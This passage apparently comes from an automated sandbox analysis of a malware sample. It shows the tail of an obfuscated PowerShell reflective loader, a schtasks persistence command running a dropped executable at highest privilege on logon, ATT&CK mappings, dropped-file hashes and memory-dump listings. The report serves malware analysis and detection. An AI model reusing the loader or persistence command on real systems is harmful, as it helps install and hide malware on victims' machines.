$TZnYn.ToArray();$IqKDG = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($QQCgF);$vjmLt = $IqKDG.EntryPoint;$vjmLt.Invoke($null, (, [string[]] ('')))
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:3748

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Windows" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\prryry.bat.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:3580

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
17286868c0a043ae5d2ff5798b6a3163

SHA1
b83b23cd57c7fb2c937f5bc18aeb7ddc955b5401

SHA256
40321e18ed0b9eb7e3bc937d3e207ea2039ff45267483ddb4a51f7974475dac6

SHA512
e15c11982c0569a389a7dbd0889edd1ef9a8ffb21c0e8ffadebc10e1353f4485524b18ca8e041c66c98d05fb984544da122755e6c2a25728453aeaf4175bdee1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
33fce25092007f2999883dba5bc93dc9

SHA1
a6315827678fa91ec5d6886c8703fa6f14eb6995

SHA256
8f4b101363fdb421cabf3e81a321357af311e76c9b6962700eef3645d2f21959

SHA512
c17ea31336a5c76dceff47dfd72f00c648dee413f45747597923802d7bf311e24b9bc2749b4a8249eda1f69095f1a3386c131c22f42cfdd8dfb8521ccfa57003

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
dc98ccecc9c3e79046ba2ae69df996d7

SHA1
7349155e8698fc44d5635a096dbe723c8f32b254

SHA256
bf47ea33b119efe2e77a3962b835c13540d93e305f85b37623e488dbc5ec869d

SHA512
f1e72db28b774f4ca9020fddcbbc4520dd7a0f5109bab24c91a70608d450beebb683b13f9a46f289422a2f634b81b91f6c5b7379ef142981b18fdcb22ee0bc93

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ticket_Reprint.pdf
Filesize
105KB

MD5
a9ab9ec7dd9b66247260a41d173c5c80

SHA1
0b22f19448a6c5e7cc898ba338a5863a72d8fb72

SHA256
101e408316eb7997bc4d2a383db92ab5a60da4742ebd7a7b8f15ca5d4d54bebe

SHA512
8e85d5e376764e6c4761525ce8dd493b42cc31aa1f698cd2644c17a3aaf3e94978be2adf49335abf32fecee9e398ba724543715fbc38dc968f0291c76ffbd78c

Download Submit
C:\Users\Admin\AppData\Local\Temp\kk.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\kk.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\pluxxy.bat
Filesize
41KB

MD5
cb8a78dd9edd76a68006e30cadf8eb27

SHA1
0ec5086b8e3a45b9ac64e98284ed2b66aaa88325

SHA256
c5f4b38a7e16440cb2e4cde3591109905c0817e4b9df4ac240892b81e7b1b000

SHA512
2d0928282929ae07c94bdb33e79308587f6ae3ce5dea3aabf4bde9abc01cc85cbd700ec59b42326ba98f4c957833ce6d65f32ed23b39cefab4508eb0aaea347a

Download Submit
C:\Users\Admin\AppData\Local\Temp\pluxxy.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\pluxxy.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\prryry.bat
Filesize
325KB

MD5
0e901cd4460579b61abece2b88f54035

SHA1
e776e751a2257cc6d56b85dd7f3c5c1a64bfc604

SHA256
59fbf83208e965445268cc973a63516dba60c68eced0d3cd8ed2e9499951dc32

SHA512
f15cbd6d506142f0c1f3f5271881c4e083d08976f34d18b72d4967efe33f4479acf3d3f3b5d9ea537f110be407a72c968204494428e1f0626ffe10bdc3df4a45

Download Submit
C:\Users\Admin\AppData\Local\Temp\prryry.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
C:\Users\Admin\AppData\Local\Temp\prryry.bat.exe
Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/200-987-0x0000000000000000-mapping.dmp

Download
memory/444-272-0x0000000000000000-mapping.dmp

Download
memory/1724-224-0x000001B6E0290000-0x000001B6E02B2000-memory.dmp

Filesize
136KB

Download
memory/1724-116-0x0000000000000000-mapping.dmp

Download
memory/1724-122-0x000001B6DF520000-0x000001B6DF542000-memory.dmp

Filesize
136KB

Download
memory/1724-127-0x000001B6DF6D0000-0x000001B6DF746000-memory.dmp

Filesize
472KB

Download
memory/1724-134-0x000001B6DF660000-0x000001B6DF688000-memory.dmp

Filesize
160KB

Download
memory/1724-136-0x000001B6DF6B0000-0x000001B6DF6C2000-memory.dmp

Filesize
72KB

Download
memory/1724-225-0x000001B6E02D0000-0x000001B6E02EE000-memory.dmp

Filesize
120KB

Download
memory/2304-329-0x0000000000000000-mapping.dmp

Download
memory/2436-231-0x0000000000000000-mapping.dmp

Download
memory/2568-817-0x0000000000000000-mapping.dmp

Download
memory/3464-753-0x0000000000000000-mapping.dmp

Download
memory/3580-1096-0x0000000000000000-mapping.dmp

Download
memory/3748-1103-0x000002462A030000-0x000002462A1F2000-memory.dmp

Filesize
1.8MB

Download
memory/3748-1102-0x0000024629DA0000-0x0000024629E52000-memory.dmp

Filesize
712KB

Download
memory/3748-1076-0x0000000000000000-mapping.dmp

Download
memory/3748-1094-0x0000024629140000-0x00000246291C8000-memory.dmp

Filesize
544KB

Download
memory/3748-1101-0x0000024629C90000-0x0000024629CE0000-memory.dmp

Filesize
320KB

Download
memory/3748-1092-0x0000024610CB0000-0x0000024610CF2000-memory.dmp

Filesize
264KB

Download
memory/4128-756-0x0000000000000000-mapping.dmp

Download
memory/4140-398-0x0000000000000000-mapping.dmp

Download
memory/4160-764-0x0000000000000000-mapping.dmp

Download
memory/4232-180-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-166-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-169-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-170-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-171-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-173-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-174-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-176-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-177-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-179-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-181-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-183-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-185-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-187-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-189-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-188-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-186-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-184-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-182-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-167-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-178-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-175-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-172-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-190-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-191-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-192-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-193-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-194-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-195-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-196-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-197-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-198-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-200-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-201-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-199-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-202-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-203-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-168-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-204-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-205-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-206-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-207-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-143-0x0000000000000000-mapping.dmp

Download
memory/4232-165-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-164-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-163-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-144-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-145-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-146-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-162-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-161-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-160-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-159-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-158-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-157-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-156-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-147-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-155-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-148-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-154-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-149-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-150-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-153-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-152-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4232-151-0x0000000077DA0000-0x0000000077F2E000-memory.dmp

Filesize
1.6MB

Download
memory/4348-939-0x000001CCCC260000-0x000001CCCC270000-memory.dmp

Filesize
64KB

Download
memory/4348-936-0x000001CCCC240000-0x000001CCCC24C000-memory.dmp

Filesize
48KB

Download
memory/4348-871-0x0000000000000000-mapping.dmp

Download
memory/4600-471-0x0000000000000000-mapping.dmp

Download
memory/4676-874-0x0000000000000000-mapping.dmp

Download
memory/4828-439-0x0000000000000000-mapping.dmp

Download
memory/4836-445-0x0000000000000000-mapping.dmp

Download
memory/4936-286-0x0000000000000000-mapping.dmp

Download